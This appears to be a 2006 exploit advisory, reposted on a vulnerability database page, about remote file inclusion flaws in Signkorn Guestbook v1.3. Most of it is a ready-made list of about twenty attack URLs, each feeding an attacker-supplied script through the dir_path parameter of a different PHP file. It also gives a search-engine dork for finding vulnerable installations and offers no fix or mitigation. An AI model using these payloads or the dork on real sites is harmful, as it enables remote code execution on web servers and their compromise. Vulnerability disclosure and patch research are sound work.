Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities

2006.09.23
Credit: ThE__LeO
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities # Discovred By : ThE__LeO ; # Software : Signkorn Guestbook v 1.3 ; # Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2" # Exploit : http://Www.Example.Com/[Script]/index.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/includes/functions.gb.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/includes/functions.admin.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/includes/admin.inc.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/help.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/smile.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/help/en/adminhelp0.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/help/en/adminhelp1.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/help/en/adminhelp3.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/help/de/adminhelp0.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/help/de/adminhelp1.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/help/de/adminhelp3.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/entry.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/admin/preview.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/admin/log.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/admin/index.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/admin/config.php?dir_path=[U r Evil Script] ; http://Www.Example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ; # Greetz : M.I.D.T[DrackanZ, Mr.IlysS, NeThug47],Arabian-FighterZ, lhma9, Death & All Moroccan & Arab Hackers ; # Safi Braka yallah Tla7 ;)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top